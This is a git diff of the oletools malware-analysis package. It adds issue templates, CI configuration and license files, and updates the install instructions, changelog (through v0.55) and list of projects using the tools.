diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md new file mode 100644 index 00000000..06c790b7 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/bug_report.md @@ -0,0 +1,33 @@ +--- +name: Bug report +about: Create a bug report to help us fix issues + +--- + +**Affected tool:** +olevba, mraptor, rtfobj, oleid, etc + +**Describe the bug** +A clear and concise description of what the bug is. + +**File/Malware sample to reproduce the bug** +Please attach the file in a password protected zip archive, or provide a link where it can be downloaded (e.g. Hybrid Analysis, preferably not VirusTotal which requires paid access). If not possible, please provide a hash. + +**How To Reproduce the bug** +Steps to reproduce the behavior, including the full command line or the options you used. + +**Expected behavior** +A clear and concise description of what you expected to happen. + +**Console output / Screenshots** +If applicable, add screenshots to help explain your problem. +Use the option "-l debug" to add debugging information, if possible. + +**Version information:** + - OS: Windows/Linux/Mac/Other + - OS version: x.xx - 32/64 bits + - Python version: 2.7/3.6 - 32/64 bits + - oletools version: + +**Additional context** +Add any other context about the problem here. diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md new file mode 100644 index 00000000..066b2d92 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/feature_request.md @@ -0,0 +1,17 @@ +--- +name: Feature request +about: Suggest an idea for this project + +--- + +**Is your feature request related to a problem? Please describe.** +A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] + +**Describe the solution you'd like** +A clear and concise description of what you want to happen. + +**Describe alternatives you've considered** +A clear and concise description of any alternative solutions or features you've considered. + +**Additional context** +Add any other context or screenshots about the feature request here. diff --git a/.gitignore b/.gitignore index edd1b098..174bad8c 100644 --- a/.gitignore +++ b/.gitignore @@ -56,7 +56,7 @@ coverage.xml # Translations *.mo -*.pot +#*.pot # Django stuff: *.log diff --git a/.travis.yml b/.travis.yml index b3e3ee09..685e5a9c 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,7 +1,19 @@ language: python - -python: - - "2.7" cache: pip +sudo: false + +matrix: + include: + - python: 2.7 + - python: 3.5 + - python: 3.6 + - python: 3.7 + - python: 3.8 + - python: pypy + - python: pypy3 + +install: + - pip install msoffcrypto-tool + script: - python setup.py test diff --git a/INSTALL.txt b/INSTALL.txt index 62e4a4ef..f1b4a464 100644 --- a/INSTALL.txt +++ b/INSTALL.txt @@ -1,16 +1,12 @@ -How to Download and Install python-oletools -=========================================== +How to Download and Install oletools +==================================== Pre-requisites -------------- -The recommended Python version to run oletools is Python 2.7. -Python 2.6 is also supported, but as it is not tested as often as 2.7, some features -might not work as expected. - -Since v0.50, oletools can also run with Python 3.x. As this is quite new, please -report any issue you may encounter. - +The recommended Python version to run oletools is the latest **Python 3.x** (3.7 for now). +Python 2.7 is still supported, but as it will become end of life in 2020 (see https://pythonclock.org/), it is highly +recommended to switch to Python 3 now. Recommended way to Download+Install/Update oletools: pip -------------------------------------------------------- @@ -23,7 +19,11 @@ system, either upgrade Python or see https://pip.pypa.io/en/stable/installing/ To download and install/update the latest release version of oletools, run the following command in a shell: +```text sudo -H pip install -U oletools +``` + +Replace `pip` by `pip3` or `pip2` to install on a specific Python version. **Important**: Since version 0.50, pip will automatically create convenient command-line scripts in /usr/local/bin to run all the oletools from any directory. @@ -33,7 +33,19 @@ in /usr/local/bin to run all the oletools from any directory. To download and install/update the latest release version of oletools, run the following command in a cmd window: +```text pip install -U oletools +``` + +Replace `pip` by `pip3` or `pip2` to install on a specific Python version. + +**Note**: with Python 3, you may need to open a cmd window with Administrator privileges in order to run pip +and install for all users. If that is not possible, you may also install only for the current user +by adding the `--user` option: + +```text +pip3 install -U --user oletools +``` **Important**: Since version 0.50, pip will automatically create convenient command-line scripts to run all the oletools from any directory: olevba, mraptor, oleid, rtfobj, etc. @@ -47,18 +59,33 @@ you may also use pip: ### Linux, Mac OSX, Unix +```text sudo -H pip install -U https://github.com/decalage2/oletools/archive/master.zip +``` + +Replace `pip` by `pip3` or `pip2` to install on a specific Python version. ### Windows +```text pip install -U https://github.com/decalage2/oletools/archive/master.zip +``` + +Replace `pip` by `pip3` or `pip2` to install on a specific Python version. + +**Note**: with Python 3, you may need to open a cmd window with Administrator privileges in order to run pip +and install for all users. If that is not possible, you may also install only for the current user +by adding the `--user` option: +```text +pip3 install -U --user https://github.com/decalage2/oletools/archive/master.zip +``` How to install offline - Computer without Internet access --------------------------------------------------------- First, download the oletools archive on a computer with Internet access: -* Latest stable version: from https://github.com/decalage2/oletools/releases +* Latest stable version: from https://pypi.org/project/oletools/ or https://github.com/decalage2/oletools/releases * Development version: https://github.com/decalage2/oletools/archive/master.zip Copy the archive file to the target computer. @@ -66,11 +93,15 @@ Copy the archive file to the target computer. On Linux, Mac OSX, Unix, run the following command using the filename of the archive that you downloaded: +```text sudo -H pip install -U oletools.zip +``` On Windows: +```text pip install -U oletools.zip +``` Old school install using setup.py @@ -88,9 +119,12 @@ Then extract the archive, open a shell and go to the oletools directory. ### Linux, Mac OSX, Unix +```text sudo -H python setup.py install +``` ### Windows: +```text python setup.py install - +``` diff --git a/LICENSE.md b/LICENSE.md new file mode 100644 index 00000000..896a57a7 --- /dev/null +++ b/LICENSE.md @@ -0,0 +1,52 @@ +This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files +published with their own license. + +The python-oletools package is copyright (c) 2012-2019 Philippe Lagadec (http://www.decalage.info) + +All rights reserved. + +Redistribution and use in source and binary forms, with or without modification, +are permitted provided that the following conditions are met: + + * Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + + +---------- + +olevba contains modified source code from the officeparser project, published +under the following MIT License (MIT): + +officeparser is copyright (c) 2014 John William Davison + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/MANIFEST.in b/MANIFEST.in new file mode 100644 index 00000000..b08e1e6c --- /dev/null +++ b/MANIFEST.in @@ -0,0 +1,14 @@ +include install.bat +include INSTALL.txt +include README.md +include requirements.txt +include oletools/README.rst +include oletools/README.html +include oletools/LICENSE.txt +include oletools/DocVarDump.vba +recursive-include oletools/thirdparty *.* +recursive-include cheatsheet *.* +global-exclude *.pyc + +recursive-include tests *.py +graft tests/test-data diff --git a/README.md b/README.md index 7f3664c8..8e3e4746 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,8 @@ python-oletools =============== -[![PyPI](https://img.shields.io/pypi/v/oletools.svg)](https://pypi.python.org/pypi/oletools) +[![PyPI](https://img.shields.io/pypi/v/oletools.svg)](https://pypi.org/project/oletools/) [![Build Status](https://travis-ci.org/decalage2/oletools.svg?branch=master)](https://travis-ci.org/decalage2/oletools) +[![Say Thanks!](https://img.shields.io/badge/Say%20Thanks-!-1EAEDB.svg)](https://saythanks.io/to/decalage2) [oletools](http://www.decalage.info/python/oletools) is a package of python tools to analyze [Microsoft OLE2 files](http://en.wikipedia.org/wiki/Compound_File_Binary_Format) @@ -18,71 +19,127 @@ See [http://www.decalage.info/python/oletools](http://www.decalage.info/python/o [Contact the Author](http://decalage.info/contact) - [Repository](https://github.com/decalage2/oletools) - [Updates on Twitter](https://twitter.com/decalage2) +[Cheatsheet](https://github.com/decalage2/oletools/blob/master/cheatsheet/oletools_cheatsheet.pdf) Note: python-oletools is not related to OLETools published by BeCubed Software. News ---- -- **2017-06-29 v0.51**: - - added the [oletools cheatsheet](https://github.com/decalage2/oletools/blob/master/cheatsheet/oletools_cheatsheet.pdf) - - improved [rtfobj](https://github.com/decalage2/oletools/wiki/rtfobj) to handle malformed RTF files, detect vulnerability CVE-2017-0199 - - olevba: improved deobfuscation and Mac files support - - [mraptor](https://github.com/decalage2/oletools/wiki/mraptor): added more ActiveX macro triggers - - added [DocVarDump.vba](https://github.com/decalage2/oletools/blob/master/oletools/DocVarDump.vba) to dump document variables using Word - - olemap: can now detect and extract [extra data at end of file](http://decalage.info/en/ole_extradata), improved display - - oledir, olemeta, oletimes: added support for zip files and wildcards - - many [bugfixes](https://github.com/decalage2/oletools/milestone/3?closed=1) in all the tools - - improved Python 2+3 support -- 2016-11-01 v0.50: all oletools now support python 2 and 3. - - olevba: several bugfixes and improvements. - - mraptor: improved detection, added mraptor_milter for Sendmail/Postfix integration. - - rtfobj: brand new RTF parser, obfuscation-aware, improved display, detect - executable files in OLE Package objects. - - setup: now creates handy command-line scripts to run oletools from any directory. -- 2016-06-10 v0.47: [olevba](https://github.com/decalage2/oletools/wiki/olevba) added PPT97 macros support, -improved handling of malformed/incomplete documents, improved error handling and JSON output, -now returns an exit code based on analysis results, new --relaxed option. -[rtfobj](https://github.com/decalage2/oletools/wiki/rtfobj): improved parsing to handle obfuscated RTF documents, -added -d option to set output dir. Moved repository and documentation to GitHub. +- **2019-12-03 v0.55**: + - olevba: + - added support for SLK files and XLM macro extraction from SLK + - VBA Stomping detection + - integrated pcodedmp to extract and disassemble P-code + - detection of suspicious keywords and IOCs in P-code + - new option --pcode to display P-code disassembly + - improved detection of auto execution triggers + - rtfobj: added URL carver for CVE-2017-0199 + - better handling of unicode for systems with locale that does not support UTF-8, e.g. LANG=C (PR #365) + - tests: + - test files can now be encrypted, to avoid antivirus alerts (PR #217, issue #215) + - tests that trigger antivirus alerts have been temporarily disabled (issue #215) +- **2019-05-22 v0.54.2**: + - bugfix release: fixed several issues related to encrypted documents + and XLM/XLF Excel 4 macros + - msoffcrypto-tool is now installed by default to handle encrypted documents + - olevba and msodde now handle documents encrypted with common passwords such + as 123, 1234, 4321, 12345, 123456, VelvetSweatShop automatically. +- **2019-04-04 v0.54**: + - olevba, msodde: added support for encrypted MS Office files + - olevba: added detection and extraction of XLM/XLF Excel 4 macros (thanks to plugin_biff from Didier Stevens' oledump) + - olevba, mraptor: added detection of VBA running Excel 4 macros + - olevba: detect and display special characters such as backspace + - olevba: colorized output showing suspicious keywords in the VBA code + - olevba, mraptor: full Python 3 compatibility, no separate olevba3/mraptor3 anymore + - olevba: improved handling of code pages and unicode + - olevba: fixed a false-positive in VBA macro detection + - rtfobj: improved OLE Package handling, improved Equation object detection + - oleobj: added detection of external links to objects in OpenXML + - replaced third party packages by PyPI dependencies +- 2018-05-30 v0.53: + - olevba and mraptor can now parse Word/PowerPoint 2007+ pure XML files (aka Flat OPC format) + - improved support for VBA forms in olevba (oleform) + - rtfobj now displays the CLSID of OLE objects, which is the best way to identify them. Known-bad CLSIDs such as MS Equation Editor are highlighted in red. + - Updated rtfobj to handle obfuscated RTF samples. + - rtfobj now handles the "\\'" obfuscation trick seen in recent samples such as https://twitter.com/buffaloverflow/status/989798880295444480, by emulating the MS Word bug described in https://securelist.com/disappearing-bytes/84017/ + - msodde: improved detection of DDE formulas in CSV files + - oledir now displays the tree of storage/streams, along with CLSIDs and their meaning. + - common.clsid contains the list of known CLSIDs, and their links to CVE vulnerabilities when relevant. + - oleid now detects encrypted OpenXML files + - fixed bugs in oleobj, rtfobj, oleid, olevba See the [full changelog](https://github.com/decalage2/oletools/wiki/Changelog) for more information. Tools: ------ -- [olebrowse](https://github.com/decalage2/oletools/wiki/olebrowse): A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to - view and extract individual data streams. +### Tools to analyze malicious documents + - [oleid](https://github.com/decalage2/oletools/wiki/oleid): to analyze OLE files to detect specific characteristics usually found in malicious files. -- [olemeta](https://github.com/decalage2/oletools/wiki/olemeta): to extract all standard properties (metadata) from OLE files. -- [oletimes](https://github.com/decalage2/oletools/wiki/oletimes): to extract creation and modification timestamps of all streams and storages. -- [oledir](https://github.com/decalage2/oletools/wiki/oledir): to display all the directory entries of an OLE file, including free and orphaned entries. -- [olemap](https://github.com/decalage2/oletools/wiki/olemap): to display a map of all the sectors in an OLE file. - [olevba](https://github.com/decalage2/oletools/wiki/olevba): to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML). - [MacroRaptor](https://github.com/decalage2/oletools/wiki/mraptor): to detect malicious VBA Macros +- [msodde](https://github.com/decalage2/oletools/wiki/msodde): to detect and extract DDE/DDEAUTO links from MS Office documents, RTF and CSV - [pyxswf](https://github.com/decalage2/oletools/wiki/pyxswf): to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis. - [oleobj](https://github.com/decalage2/oletools/wiki/oleobj): to extract embedded objects from OLE files. - [rtfobj](https://github.com/decalage2/oletools/wiki/rtfobj): to extract embedded objects from RTF files. -- and a few others (coming soon) + +### Tools to analyze the structure of OLE files + +- [olebrowse](https://github.com/decalage2/oletools/wiki/olebrowse): A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to + view and extract individual data streams. +- [olemeta](https://github.com/decalage2/oletools/wiki/olemeta): to extract all standard properties (metadata) from OLE files. +- [oletimes](https://github.com/decalage2/oletools/wiki/oletimes): to extract creation and modification timestamps of all streams and storages. +- [oledir](https://github.com/decalage2/oletools/wiki/oledir): to display all the directory entries of an OLE file, including free and orphaned entries. +- [olemap](https://github.com/decalage2/oletools/wiki/olemap): to display a map of all the sectors in an OLE file. + Projects using oletools: ------------------------ oletools are used by a number of projects and online malware analysis services, -including [Viper](http://viper.li/), [REMnux](https://remnux.org/), +including +[ACE](https://github.com/IntegralDefense/ACE), +[Anlyz.io](https://sandbox.anlyz.io/), +[AssemblyLine](https://www.cse-cst.gc.ca/en/assemblyline), +[CAPE](https://github.com/ctxis/CAPE), +[CinCan](https://cincan.io), +[Cuckoo Sandbox](https://github.com/cuckoosandbox/cuckoo), +[DARKSURGEON](https://github.com/cryps1s/DARKSURGEON), +[Deepviz](https://sandbox.deepviz.com/), +[dridex.malwareconfig.com](https://dridex.malwareconfig.com), +[EML Analyzer](https://github.com/ninoseki/eml_analyzer), [FAME](https://certsocietegenerale.github.io/fame/), +[FLARE-VM](https://github.com/fireeye/flare-vm), [Hybrid-analysis.com](https://www.hybrid-analysis.com/), +[IntelOwl](https://github.com/certego/IntelOwl), [Joe Sandbox](https://www.document-analyzer.net/), -[Deepviz](https://sandbox.deepviz.com/), [Laika BOSS](https://github.com/lmco/laikaboss), -[Cuckoo Sandbox](https://github.com/cuckoosandbox/cuckoo), -[Anlyz.io](https://sandbox.anlyz.io/), -[ViperMonkey](https://github.com/decalage2/ViperMonkey), +[MacroMilter](https://github.com/sbidy/MacroMilter), +[mailcow](https://mailcow.email/), +[malshare.io](https://malshare.io), +[malware-repo](https://github.com/Tigzy/malware-repo), +[Malware Repository Framework (MRF)](https://www.adlice.com/download/mrf/), +[olefy](https://github.com/HeinleinSupport/olefy), +[PeekabooAV](https://github.com/scVENUS/PeekabooAV), [pcodedmp](https://github.com/bontchev/pcodedmp), -[dridex.malwareconfig.com](https://dridex.malwareconfig.com), -and probably [VirusTotal](https://www.virustotal.com). +[PyCIRCLean](https://github.com/CIRCL/PyCIRCLean), +[REMnux](https://remnux.org/), +[Snake](https://github.com/countercept/snake), +[SNDBOX](https://app.sndbox.com), +[SpuriousEmu](https://github.com/ldbo/SpuriousEmu), +[Strelka](https://github.com/target/strelka), +[stoQ](https://stoq.punchcyber.com/), +[TheHive/Cortex](https://github.com/TheHive-Project/Cortex-Analyzers), +[TSUGURI Linux](https://tsurugi-linux.org/), +[Vba2Graph](https://github.com/MalwareCantFly/Vba2Graph), +[Viper](http://viper.li/), +[ViperMonkey](https://github.com/decalage2/ViperMonkey), +[YOMI](https://yomi.yoroi.company), +and probably [VirusTotal](https://www.virustotal.com). +And quite a few [other projects on GitHub](https://github.com/search?q=oletools&type=Repositories). (Please [contact me]((http://decalage.info/contact)) if you have or know a project using oletools) @@ -135,7 +192,7 @@ License This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license. -The python-oletools package is copyright (c) 2012-2017 Philippe Lagadec (http://www.decalage.info) +The python-oletools package is copyright (c) 2012-2019 Philippe Lagadec (http://www.decalage.info) All rights reserved. diff --git a/README.rst b/README.rst new file mode 100644 index 00000000..db55e5fd --- /dev/null +++ b/README.rst @@ -0,0 +1 @@ +Needed for setup.py diff --git a/doc/empty_file.txt b/doc/empty_file.txt new file mode 100644 index 00000000..944c593a --- /dev/null +++ b/doc/empty_file.txt @@ -0,0 +1 @@ +Nothing to see here. diff --git a/oletools/LICENSE.txt b/oletools/LICENSE.txt index 5651e936..4a964f86 100644 --- a/oletools/LICENSE.txt +++ b/oletools/LICENSE.txt @@ -1,54 +1,54 @@ -LICENSE for the python-oletools package: - -This license applies to the python-oletools package, apart from the thirdparty -folder which contains third-party files published with their own license. - -The python-oletools package is copyright (c) 2012-2017 Philippe Lagadec (http://www.decalage.info) - -All rights reserved. - -Redistribution and use in source and binary forms, with or without modification, -are permitted provided that the following conditions are met: - - * Redistributions of source code must retain the above copyright notice, this - list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above copyright notice, - this list of conditions and the following disclaimer in the documentation - and/or other materials provided with the distribution. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE -FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL -DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER -CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, -OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - - ----------- - -olevba contains modified source code from the officeparser project, published -under the following MIT License (MIT): - -officeparser is copyright (c) 2014 John William Davison - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. +LICENSE for the python-oletools package: + +This license applies to the python-oletools package, apart from the thirdparty +folder which contains third-party files published with their own license. + +The python-oletools package is copyright (c) 2012-2019 Philippe Lagadec (http://www.decalage.info) + +All rights reserved. + +Redistribution and use in source and binary forms, with or without modification, +are permitted provided that the following conditions are met: + + * Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + + +---------- + +olevba contains modified source code from the officeparser project, published +under the following MIT License (MIT): + +officeparser is copyright (c) 2014 John William Davison + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/oletools/README.html b/oletools/README.html index 5a3199ec..cff9e81f 100644 --- a/oletools/README.html +++ b/oletools/README.html @@ -1,58 +1,103 @@ - - + +
- - + -oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.
-Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the Author - Repository - Updates on Twitter
+Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the Author - Repository - Updates on Twitter Cheatsheet
Note: python-oletools is not related to OLETools published by BeCubed Software.
See the full changelog for more information.
oletools are used by a number of projects and online malware analysis services, including Viper, REMnux, FAME, Hybrid-analysis.com, Joe Sandbox, Deepviz, Laika BOSS, Cuckoo Sandbox, Anlyz.io, ViperMonkey, pcodedmp, dridex.malwareconfig.com, and probably VirusTotal. (Please contact me if you have or know a project using oletools)
+oletools are used by a number of projects and online malware analysis services, including ACE, Anlyz.io, AssemblyLine, CAPE, Cuckoo Sandbox, DARKSURGEON, Deepviz, dridex.malwareconfig.com, FAME, FLARE-VM, Hybrid-analysis.com, Joe Sandbox, Laika BOSS, MacroMilter, mailcow, malshare.io, malware-repo, Malware Repository Framework (MRF), olefy, PeekabooAV, pcodedmp, PyCIRCLean, REMnux, Snake, SNDBOX, Strelka, stoQ, TheHive/Cortex, TSUGURI Linux, Vba2Graph, Viper, ViperMonkey, YOMI, and probably VirusTotal. And quite a few other projects on GitHub. (Please contact me if you have or know a project using oletools)
The recommended way to download and install/update the latest stable release of oletools is to use pip:
The code is available in a GitHub repository. You may use it to submit enhancements using forks and pull requests.
This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.
-The python-oletools package is copyright (c) 2012-2017 Philippe Lagadec (http://www.decalage.info)
+The python-oletools package is copyright (c) 2012-2019 Philippe Lagadec (http://www.decalage.info)
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
This is the home page of the documentation for python-oletools. The latest version can be found online, otherwise a copy is provided in the doc subfolder of the package.
python-oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.
Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the Author - Repository - Updates on Twitter
Note: python-oletools is not related to OLETools published by BeCubed Software.
The recommended Python version to run oletools is Python 2.7. Python 2.6 is also supported, but as it is not tested as often as 2.7, some features might not work as expected.
-Since oletools v0.50, thanks to contributions by [@Sebdraven](https://twitter.com/Sebdraven), most tools can also run with Python 3.x. As this is quite new, please report any issue you may encounter.
+The recommended Python version to run oletools is the latest Python 3.x (3.7 for now). Python 2.7 is still supported, but as it will become end of life in 2020 (see https://pythonclock.org/), it is highly recommended to switch to Python 3 now.
Pip is included with Python since version 2.7.9 and 3.4. If it is not installed on your system, either upgrade Python or see https://pip.pypa.io/en/stable/installing/
To download and install/update the latest release version of oletools, run the following command in a shell:
sudo -H pip install -U oletools
+Replace pip
by pip3
or pip2
to install on a specific Python version.
Important: Since version 0.50, pip will automatically create convenient command-line scripts in /usr/local/bin to run all the oletools from any directory.
To download and install/update the latest release version of oletools, run the following command in a cmd window:
pip install -U oletools
+Replace pip
by pip3
or pip2
to install on a specific Python version.
Note: with Python 3, you may need to open a cmd window with Administrator privileges in order to run pip and install for all users. If that is not possible, you may also install only for the current user by adding the --user
option:
pip3 install -U --user oletools
Important: Since version 0.50, pip will automatically create convenient command-line scripts to run all the oletools from any directory: olevba, mraptor, oleid, rtfobj, etc.
If you want to benefit from the latest improvements in the development version, you may also use pip:
sudo -H pip install -U https://github.com/decalage2/oletools/archive/master.zip
+Replace pip
by pip3
or pip2
to install on a specific Python version.
pip install -U https://github.com/decalage2/oletools/archive/master.zip
+Replace pip
by pip3
or pip2
to install on a specific Python version.
Note: with Python 3, you may need to open a cmd window with Administrator privileges in order to run pip and install for all users. If that is not possible, you may also install only for the current user by adding the --user
option:
pip3 install -U --user https://github.com/decalage2/oletools/archive/master.zip
First, download the oletools archive on a computer with Internet access: * Latest stable version: from https://github.com/decalage2/oletools/releases * Development version: https://github.com/decalage2/oletools/archive/master.zip
+First, download the oletools archive on a computer with Internet access: * Latest stable version: from https://pypi.org/project/oletools/ or https://github.com/decalage2/oletools/releases * Development version: https://github.com/decalage2/oletools/archive/master.zip
Copy the archive file to the target computer.
On Linux, Mac OSX, Unix, run the following command using the filename of the archive that you downloaded:
sudo -H pip install -U oletools.zip
@@ -52,16 +67,17 @@ This license applies to the python-oletools package, apart from the thirdparty folder which contains third-party files published with their own license.
-The python-oletools package is copyright (c) 2012-2017 Philippe Lagadec (http://www.decalage.info)
+The python-oletools package is copyright (c) 2012-2019 Philippe Lagadec (http://www.decalage.info)
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
